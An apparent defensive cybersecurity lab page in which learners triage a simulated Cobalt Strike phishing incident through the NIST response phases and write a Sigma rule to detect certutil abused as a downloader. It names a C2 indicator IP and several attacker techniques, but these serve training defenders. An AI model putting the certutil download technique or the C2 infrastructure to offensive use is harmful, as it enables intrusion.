Lab 14 — Run an Incident in TheHive¶
Hands-on lab · ← Back to the module concept
Setup¶
git clone https://github.com/plaintext-security/plaintext-labs
cd plaintext-labs/defensive/14-triage-ir
make up # builds the Python triage harness
make demo # walks through INC-2024-0315-001 across all 5 NIST phases
make down
Bundled data: incident_pack.json — a structured incident pack
for INC-2024-0315-001 (a Cobalt Strike macro-phishing compromise, the
same kill chain carried through modules 02/05/06/11): initial alert, 8
observables, 8-event timeline, threat-intel enrichment, affected assets,
and per-phase triage questions. The pack's malware family and C2 IOC
type are anchored to real abuse.ch ThreatFox Cobalt Strike intel (see
data/PROVENANCE.md). The triage.py harness walks through NIST SP
800-61 phases (Detection → Containment → Eradication → Recovery →
Post-Incident Review) so you practice the reasoning without needing a
TheHive/Jira instance.
Authorization: this lab analyzes a bundled simulated incident only — no live system access.
Scenario¶
You're on call when the IDS fires. The alert shows ET POLICY PE EXE
or DLL Windows file download HTTP from 10.0.1.55. Run make demo to
open the case, work through the triage questions, and reach a verdict.
Do¶
-
[ ] Run
make demoand follow all five phases. At the triage checklist (Phase 1), write your answers before reading the threat- intel enrichment section — then compare. Did the observable data alone support a CRITICAL verdict? -
[ ] The containment phase lists four "Do NOT" actions. Pick any two and explain the forensic or operational risk they introduce. Add your explanation as a comment in
triage.py. -
[ ] The eradication phase lists 4 persistence artifacts. The harness shows
stage1.exein the timeline but it's not in the eradication list. Is that a gap? Updateincident_pack.jsonto add it (or add a comment explaining why it's omitted). -
[ ] The post-incident review ranks 4 improvement actions. Add a fifth: a detection rule for certutil being used as a downloader. Write it as a Sigma rule YAML snippet in
incident.md. -
[ ] Extend
triage.pywith a--generate-reportflag that writesincident.md— a Markdown incident report template populated with the pack's incident ID, timeline, observables table, and five blank answer sections. Commit it.
Success criteria — you're done when¶
- [ ] You answered all Phase 1 triage questions before reading the threat-intel section and reached the correct severity.
- [ ] Your Sigma rule for certutil downloading is syntactically valid.
- [ ]
--generate-reportproduces aincident.mdtemplate.
Deliverables¶
incident.md: the triage decision and rationale, the containment
actions you'd take, the eradication checklist (with stage1.exe
addressed), your certutil Sigma rule, and the one improvement action
you'd prioritize. This is the Phase 2 capstone incident report.
AI acceleration¶
Have a model draft the Sigma rule for certutil LOLBin download — then
test it against the Sysmon event data from module 11. Models commonly
confuse CommandLine|contains with CommandLine|startswith; the
Sigma spec
is the authority.
Automate & own it¶
Required. With AI drafting and you reviewing every line: add a
--api flag to triage.py that outputs the incident pack to TheHive
v5's API format (JSON with title, severity, tags, observables
arrays per the TheHive schema).
Commit the extended script.
Connects forward¶
The C2 indicator (185.220.101.47) connects to module 15's threat-intel enrichment — this is where the ThreatFox lookup you built pays off. The improvement actions from the post-incident review connect to module 16 (SOAR automation) and back to module 08 (detection-as-code).
Marketable proof¶
"I triage real alerts through the NIST SP 800-61 lifecycle — from initial IDS signal to a documented root-cause verdict — and turn each incident into a concrete detection improvement."
Stretch¶
- Build a
--scoreflag that assigns a numeric risk score (1–100) to the incident based on: C2 in threat intel (×2), encoded PS (×1.5), persistence count (×1 per artifact), affected segment sensitivity (FINANCE = ×2, DMZ = ×1). Apply it to INC-2024-0315-001 and justify the weighting inincident.md.
Comments
Sign in with GitHub to comment. Choose the type: Feedback (errors or suggestions on this page) · Hints (help for fellow learners — no spoilers) · General (anything else).